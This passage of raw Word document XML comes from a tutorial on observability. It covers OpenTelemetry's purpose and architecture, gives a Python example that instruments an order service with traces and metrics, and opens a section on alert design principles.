      <w:r w:rsidRPr="007A2456">
        <w:t>OpenTelemetry (OTel) is the industry-standard framework for instrumenting, generating, collecting, and exporting telemetry data (traces, metrics, logs). It provides vendor-neutral APIs, SDKs, and tools.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F3FACC" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E9430C" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>Before OpenTelemetry:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47BDDC28" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  Traces: OpenTracing (API) vs OpenCensus (API + SDK) — incompatible standards</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59B3B83B" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  Metrics: Prometheus client, StatsD, Datadog agent — all different</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EAF9722" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  Logs: Every framework has its own format</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1145DC2E" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456"/>
    <w:p w14:paraId="401C889C" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>After OpenTelemetry:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21B18F7B" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  ONE unified standard for all three signals.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33DA2E1D" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  Instrument once → export to any backend (Jaeger, Prometheus, Datadog, New Relic, etc.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5427CC80" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.2 OTel Architecture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15DD2CA9" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="610700EC" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>┌─────────────────────────────────────────────────────┐</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64BB3A0B" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>│                   Application                        │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DAEAFCE" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>│                                                      │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="319B5CAF" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>│  ┌─────────────────────────────────────────┐        │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="303F8050" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>│  │         OTel SDK (per-language)          │        │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F2A55A2" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>│  │                                          │        │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6623CFC9" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>│  │  Auto-instrumentation:                   │        │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E74B1C" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:lastRenderedPageBreak/>
        <w:t>│  │    HTTP clients/servers                  │        │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="723912A9" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>│  │    Database drivers                      │        │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="128DE505" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>│  │    gRPC, messaging, etc.                 │        │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68979B99" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>│  │                                          │        │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B3931EC" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>│  │  Manual instrumentation:                 │        │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C3CEF71" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>│  │    Custom spans, metrics, log events     │        │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48BAB18B" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>│  │                                          │        │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D3A0620" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>│  │  Context propagation:                    │        │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7609D14A" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>│  │    Trace context across threads/services │        │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71AEF1A6" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>│  └────────────────────</w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┬</w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>────────────────────┘</w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>│</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F79718D" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>│                       │ OTLP (OpenTelemetry Protocol)│</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51061EFD" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>└───────────────────────</w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┼</w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>─────────────────────────────┘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72DFB7E8" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">                        </w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>▼</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B9F43FC" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>┌─────────────────────────────────────────────────────┐</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77FFC208" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>│              OTel Collector                           │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C3A28C" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>│                                                      │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="513F8F3A" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>│  Receivers:    OTLP, Jaeger, Zipkin, Prometheus      │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E669105" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>│  Processors:   Batching, filtering, sampling,        │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD62457" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>│                attribute enrichment, tail sampling    │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="253CE7F0" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>│  Exporters:    OTLP, Jaeger, Prometheus, Datadog,    │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C9A9CDC" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>│                Elasticsearch, cloud vendors           │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42806004" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>└─────────────────────────────────────────────────────┘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F046DA" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.3 Instrumentation Example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09DB0B64" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>Python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3350A7E9" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>from opentelemetry import trace, metrics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38467268" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>from opentelemetry.sdk.trace import TracerProvider</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="019FD4AE" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:lastRenderedPageBreak/>
        <w:t>from opentelemetry.sdk.metrics import MeterProvider</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BAEC2F7" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456"/>
    <w:p w14:paraId="2A7A80EF" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t># Setup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38B111F0" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>trace.set_tracer_provider(TracerProvider())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C09F81B" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>tracer = trace.get_tracer("order-service")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25800E6F" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>meter = metrics.get_meter("order-service")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CB67E15" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456"/>
    <w:p w14:paraId="400FC997" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t># Metrics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38B57727" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>order_counter = meter.create_counter("orders_created_total")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24A8F015" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>order_duration = meter.create_histogram("order_creation_duration_seconds")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000F121A" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456"/>
    <w:p w14:paraId="5D3612F6" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t># Tracing + Metrics in business logic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E8244F3" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>def create_order(user_id, items):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="669C2718" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">    with tracer.start_as_current_span("create_order") as span:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F94B7A3" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">        span.set_attribute("user_id", user_id)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57559B9D" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">        span.set_attribute("item_count", len(items))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A3FC71B" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC60DF5" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">        start = time.time()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08123DDC" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EDBC9D5" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">        # Child span for inventory check</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10DAD0F7" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">        with tracer.start_as_current_span("check_inventory"):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="358F4C61" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">            inventory_result = inventory_service.check(items)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5571E500" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">            if not inventory_result.available:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D6B20F2" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">                span.set_status(StatusCode.ERROR, "Out of stock")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61DBA5A0" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">                raise OutOfStockError()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="426DD06E" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E1D59E" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        # Child span for payment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37CCD714" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">        with tracer.start_as_current_span("process_payment") as payment_span:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4863FB73" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">            payment_span.set_attribute("amount", calculate_total(items))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB234CF" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">            payment_result = payment_service.charge(user_id, items)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A0AE5B" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="104DCC00" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">        # Child span for DB write</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1397E7E8" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">        with tracer.start_as_current_span("save_order"):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45A862D5" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">            order = db.save(user_id, items, payment_result)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E45E04" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EF7BB16" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">        # Record metrics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D10998" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">        duration = time.time() - start</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E69D473" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">        order_counter.add(1, {"status": "success"})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D081D84" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">        order_duration.record(duration)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B610D59" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4549D23E" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">        return order</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C13763B" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:pict w14:anchorId="7F8F0C9F">
          <v:rect id="_x0000_i6133" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="51AB89E1" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4. Alerting — Turning Observability into Action</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD54B6A" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.1 Alert Design Principles</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DBAF0B5" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Alert on symptoms, not causes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67B1295E" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="128CDE48" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>BAD (cause-based):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41382F8C" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  Alert: "CPU usage &gt; 80%"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2384DAF6" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  Problem: High CPU doesn't necessarily mean users are affected.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD0E5AF" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  Result: Alert fatigue — too many non-actionable alerts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B084E00" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456"/>
